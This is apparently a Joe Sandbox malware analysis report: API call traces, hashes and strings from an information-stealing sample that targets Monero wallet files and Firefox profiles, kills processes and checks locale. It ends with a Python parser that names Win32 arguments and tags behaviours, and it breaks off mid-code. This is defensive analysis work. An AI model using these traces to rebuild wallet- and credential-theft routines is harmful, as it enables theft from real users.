                                    • Instruction ID: 118c8be362ea6d8ce1095f808274da67fd5d0bd4c7e652ca3c6008bb1e6fbb8d
                                    • Opcode Fuzzy Hash: 01061f7f7918f5f79bf2eae0ca6e9520df251dc29b7f096e9b58e2ddeb482968
                                    • Instruction Fuzzy Hash: 1D5157B2504218ABCB35EBB0DD85EEE737DBB58300F4085C8B64D96051EB75AB89CF90
                                    APIs
                                    • wsprintfA.USER32 ref: 0036EE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0036EE55
                                    • StrCmpCA.SHLWAPI(?,00381630), ref: 0036EEAB
                                    • StrCmpCA.SHLWAPI(?,00381634), ref: 0036EEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036F3AE
                                    • FindClose.KERNEL32(000000FF), ref: 0036F3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: e046ddfbcc50412dd636179216a32e9bc5ed840841b96fe1f0112060550810d7
                                    • Instruction ID: 60e6b023649b67d951babee8dcf1c077f7989e07e15729df1956b7eb91e2f867
                                    • Opcode Fuzzy Hash: e046ddfbcc50412dd636179216a32e9bc5ed840841b96fe1f0112060550810d7
                                    • Instruction Fuzzy Hash: 0DE101729115189ADB66FB60CCA2EEE737DAF94300F4085D9B40F66092EE346F89CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: 1c699076feadc95f850530779eb71003b5e410156e71aa0cf2a70b51792c1573
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: 3FE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003816B0,00380D97), ref: 0036F81E
                                    • StrCmpCA.SHLWAPI(?,003816B4), ref: 0036F86F
                                    • StrCmpCA.SHLWAPI(?,003816B8), ref: 0036F885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036FBB1
                                    • FindClose.KERNEL32(000000FF), ref: 0036FBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: bbb0d286268281a1a67a50e971ca3cd86d5bb5476b7110da1681b7e562057a01
                                    • Instruction ID: cabdf3e69b1e432ca4b3187395f612e11eff1f79ac8648016d74eb2580c56fa1
                                    • Opcode Fuzzy Hash: bbb0d286268281a1a67a50e971ca3cd86d5bb5476b7110da1681b7e562057a01
                                    • Instruction Fuzzy Hash: 37B12E71A105089BCB36FB64DD96EEE7379AF94300F10C5A8A40E5A195EF346B48CF92
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0038523C,?,?,?,003852E4,?,?,00000000,?,00000000), ref: 00361963
                                    • StrCmpCA.SHLWAPI(?,0038538C), ref: 003619B3
                                    • StrCmpCA.SHLWAPI(?,00385434), ref: 003619C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00361D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00361E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00361E60
                                    • FindClose.KERNEL32(000000FF), ref: 00361E72
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: f508bd089ebdd27366ac1133208ce1e9bf9a4b344518fa4edcb9b555734d8aa0
                                    • Instruction ID: b0848ea7d9d1cfea19abb33340410d56ac5a343e82ef0e9bdc0f0688079569c3
                                    • Opcode Fuzzy Hash: f508bd089ebdd27366ac1133208ce1e9bf9a4b344518fa4edcb9b555734d8aa0
                                    • Instruction Fuzzy Hash: 5E12CF71910519ABCB27FB60CCA6EEE7379AF94300F5085D9B10E6A091EF746B88CF51
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00380C32), ref: 0036DF5E
                                    • StrCmpCA.SHLWAPI(?,003815C0), ref: 0036DFAE
                                    • StrCmpCA.SHLWAPI(?,003815C4), ref: 0036DFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036E4E0
                                    • FindClose.KERNEL32(000000FF), ref: 0036E4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 92693341babf4ecea62b4d53c802e2b02976864e94f603c0d5327768c7bc7167
                                    • Instruction ID: 66ed6ed3acddfb196916f8b1e25158cc3ee9c38487f90bf09f5530622ec6c08d
                                    • Opcode Fuzzy Hash: 92693341babf4ecea62b4d53c802e2b02976864e94f603c0d5327768c7bc7167
                                    • Instruction Fuzzy Hash: A8F19B719145189ACB37FB60CDA6EEE7379AF94300F5085D9A00F6A091EF346B89CF61
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003815A8,00380BAF), ref: 0036DBEB
                                    • StrCmpCA.SHLWAPI(?,003815AC), ref: 0036DC33
                                    • StrCmpCA.SHLWAPI(?,003815B0), ref: 0036DC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036DECC
                                    • FindClose.KERNEL32(000000FF), ref: 0036DEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 562fdb64f31454ec0821a3eb9203794b0e07d2a2f5367ad5d5cd573797371cd9
                                    • Instruction ID: 3fb466d0b7fbc94c614064aa7f3e0a62d7f49619ecd3d3143363e5c7a9d16d0e
                                    • Opcode Fuzzy Hash: 562fdb64f31454ec0821a3eb9203794b0e07d2a2f5367ad5d5cd573797371cd9
                                    • Instruction Fuzzy Hash: F991F172A105049BCB26FB74DD96DED737DABD4300F00C5A9F90B9A185EE349B48CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: "E$;G7)$;Y{n$Pai$S!?v$WM$bz^$iPLq$=
                                    • API String ID: 0-3350677368
                                    • Opcode ID: 848a6a41a3e8b42dd1094badb67e77bca15df2ea53f7f78114402c657d4b4197
                                    • Instruction ID: fec2a41f34869d224cc580b41f58f277761fefa9528d779dda2355f8e60bf092
                                    • Opcode Fuzzy Hash: 848a6a41a3e8b42dd1094badb67e77bca15df2ea53f7f78114402c657d4b4197
                                    • Instruction Fuzzy Hash: DEB239F360C2049FE308AE2DEC8567AFBE9EF94720F1A493DE6C5C3744E97558018696
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00379905
                                    • Process32First.KERNEL32(00369FDE,00000128), ref: 00379919
                                    • Process32Next.KERNEL32(00369FDE,00000128), ref: 0037992E
                                    • StrCmpCA.SHLWAPI(?,00369FDE), ref: 00379943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0037995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0037997A
                                    • CloseHandle.KERNEL32(00000000), ref: 00379987
                                    • CloseHandle.KERNEL32(00369FDE), ref: 00379993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: eb57ffb3332fc9c69dbdb8a0c8c5d3e311a244465d1e308c1f0a28227fb9c9f9
                                    • Instruction ID: e29a27331390753ea7b29093219900412ab7c29d5172950c51405d98f0f4387b
                                    • Opcode Fuzzy Hash: eb57ffb3332fc9c69dbdb8a0c8c5d3e311a244465d1e308c1f0a28227fb9c9f9
                                    • Instruction Fuzzy Hash: FC112EB5A04208ABDB34DFA0DC48BDEB7B9BB49700F0095CCF609A6240DB749B84DF90
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,003805B7), ref: 00377D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00377D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00377D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00377DF2
                                    • LocalFree.KERNEL32(00000000), ref: 00377EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: f27fb24ce596b9f151bbc7abf32461e7340bfa00e331e5b9669b63aa9eed53ac
                                    • Instruction ID: eafe9d8dd0a03e8a01a29bcb39f2a526120848deb8ac2b94f02b1e277427aa5b
                                    • Opcode Fuzzy Hash: f27fb24ce596b9f151bbc7abf32461e7340bfa00e331e5b9669b63aa9eed53ac
                                    • Instruction Fuzzy Hash: 0B414D71940218ABDB35DB94DC99BEEB379FB44700F2081D9E00A66590DB782F84CFA1
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00380D79), ref: 0036E5A2
                                    • StrCmpCA.SHLWAPI(?,003815F0), ref: 0036E5F2
                                    • StrCmpCA.SHLWAPI(?,003815F4), ref: 0036E608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036ECDF
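The API listings above read more easily once the literal arguments are named and the call order is matched against known idioms: the FindFirstFileA / StrCmpCA / StrCmpCA / FindNextFileA directory walks (with CopyFileA at 00361D80 in the first one), the CreateToolhelp32Snapshot / Process32First / Process32Next / StrCmpCA / OpenProcess / TerminateProcess loop at 00379905, and the GetKeyboardLayoutList / GetLocaleInfoA pair at 00377D71. The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code: it parses lines in the shape the report prints them, names the Win32 constants that appear as literals (0x2 = TH32CS_SNAPPROCESS, 0x1 = PROCESS_TERMINATE, 0x40 = LPTR, 0x2 = LOCALE_SLANGUAGE, 0x128 = sizeof(PROCESSENTRY32) for an x86 ANSI build), and tags each listing with a behaviour. The behaviour names, the signature table, and the reading of the two back-to-back StrCmpCA calls as the usual "." / ".." skip are this example's own assumptions; the embedded sample traces are copied from the listings above and serve as constructed test input.

```python
"""Name literal Win32 arguments in Joe Sandbox API listings and tag the call
order with a behaviour. Added example; the tables below are its own."""
import re
from dataclasses import dataclass

# "• Func.MODULE(arg,...), ref: ADDR", optionally prefixed "Part of subcall function X:"
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: int          # call-site address
    in_subcall: bool  # True for "Part of subcall function ..." lines

def parse_trace(text: str) -> list:
    """Listing text -> ApiCall records; header lines such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["func"], m["mod"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls

# (function, zero-based argument index) -> {literal value: symbolic name}
NAMED_ARGS = {
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("OpenProcess", 0): {0x1: "PROCESS_TERMINATE"},
    ("Process32First", 1): {0x128: "sizeof(PROCESSENTRY32), x86 ANSI"},
    ("CopyFileA", 2): {0x1: "bFailIfExists=TRUE"},
    ("LocalAlloc", 0): {0x40: "LPTR (LMEM_FIXED|LMEM_ZEROINIT)"},
    ("GetLocaleInfoA", 1): {0x2: "LOCALE_SLANGUAGE"},
}

def decode_args(call: ApiCall) -> dict:
    """{argument index: name} for the literal arguments NAMED_ARGS knows."""
    out = {}
    for i, raw in enumerate(call.args):
        table = NAMED_ARGS.get((call.func, i))
        if table and re.fullmatch(r"[0-9A-Fa-f]{8}", raw) and int(raw, 16) in table:
            out[i] = table[int(raw, 16)]
    return out

# Ordered API subsequences that mean more together than any single call does.
BEHAVIOURS = {
    # snapshot, walk process list, compare names, open with PROCESS_TERMINATE, kill
    "process_kill_loop": ("CreateToolhelp32Snapshot", "Process32First", "Process32Next",
                          "StrCmpCA", "OpenProcess", "TerminateProcess"),
    # FindFirstFile, two name compares (assumed: the usual "." / ".." skip), FindNextFile
    "directory_walk": ("FindFirstFileA", "StrCmpCA", "StrCmpCA", "FindNextFileA"),
    # a walk that also copies out what it finds
    "file_collection": ("FindFirstFileA", "CopyFileA", "FindNextFileA"),
    # enumerate installed keyboard layouts, resolve each to a language name
    "keyboard_language_enum": ("GetKeyboardLayoutList", "GetLocaleInfoA"),
}

def is_subsequence(needle, haystack) -> bool:
    it = iter(haystack)
    return all(any(x == n for x in it) for n in needle)

def classify(calls: list) -> list:
    """Behaviours whose signature occurs, in address order, in the function's own calls."""
    own = [c.func for c in sorted(calls, key=lambda c: c.ref) if not c.in_subcall]
    return [name for name, sig in BEHAVIOURS.items() if is_subsequence(sig, own)]

def analyze(text: str) -> dict:
    calls = parse_trace(text)
    decoded = {}
    for c in calls:
        names = decode_args(c)
        if names:
            decoded[f"{c.func}@{c.ref:08X}"] = names
    return {"calls": calls, "decoded": decoded, "behaviours": classify(calls)}

# Sample listings copied from the report above (constructed test input for this example).
SAMPLE_PROCESS_KILL = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00379905
• Process32First.KERNEL32(00369FDE,00000128), ref: 00379919
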